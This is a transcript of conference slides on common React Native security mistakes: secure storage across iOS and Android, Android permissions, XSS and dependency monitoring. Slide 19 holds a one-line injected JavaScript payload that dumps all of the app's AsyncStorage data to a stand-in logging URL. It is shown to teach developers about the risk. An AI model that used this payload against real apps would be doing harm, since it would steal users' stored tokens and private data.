React Native Security

Transcript

1. React Native Security Addressing Typical Mistakes JULIA POTAPENKO

2. About me Security Software Engineer at Cossack Labs We help

   companies to protect their sensitive and valuable data. @julepka

3. We will talk about Architecture Platforms usage Dependencies

4. “Choosing React Native and its components means that you understand

   and accept potential security consequences.”

5. Architecture basics React Native is a cross-platform solution from Facebook

   that allows writing native apps using React (JavaScript or TypeScript).

6. Trusting third parties Apple and Google are must haves. Add

   Facebook to the list.

7. Trusting third parties Apple and Google are must haves. Add

   Facebook to the list.

8. Trusting third parties Apple and Google are must haves. Add

   Facebook to the list. CVE-2020-1911 CVE-2020-1912 CVE-2020-1913

9. “Working with React Native developers deal with security for all

   three platforms: iOS, Android and React Native.”

10. OWASP Mobile Top 10 #1 Improper platform usage

11. React Native is a leaky abstraction @vixentael

12. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes

13. Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data

    stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes

14. Managing Android Permissions Android: You can add permissions in multiple

    files

15. Managing Android Permissions Android: You can add permissions in multiple

    files + React Navite: It is common practice to use third-party solutions

16. Managing Android Permissions Android: You can add permissions in multiple

    files + React Navite: It is common practice to use third-party solutions =

17. Managing Android Permissions Android: You can add permissions in multiple

    files + React Native: It is common practice to use third-party solutions = I don’t need this permission The app crashes if I delete it

18. Is XSS possible? XSS possibility is decreases by design.

19. Is XSS possible? XSS possibility is decreases by design. XSS

    is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval-based injection and accessing React Native APIs

20. Apart from Source Code Annual BIS Reports US encryption export

    regulations Apple privacy rules User acknowledgement about private data usage

21. “50 shades of dependencies”

22. A typical day for React Native app developer

23. A typical day for React Native app developer (It is

    joke )

24. Monitoring dependencies

25. Monitoring dependencies So many dependencies Additional CI work Integrating dependency

    checkers

26. Monitoring dependencies So many dependencies Additional CI work One update

    triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability?

27. ✅ Learn more about the issue, its scope ✅ Document

    it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix?

28. ✅ Learn more about the issue, its scope ✅ Document

    it, make the team aware ✅ Monitor it and book the time for the update What if there is no fix? React Native requires team to plan time more carefully

29. React Native requires team to plan time more carefully ➡

    iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update

30. Final Thoughts “Learn once, write anywhere.” “Learn once, ask mobile

    security people for help.”

31. Where to go next My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html

    React Native Security Guide https://reactnative.dev/docs/security

32. Thank You! @julepka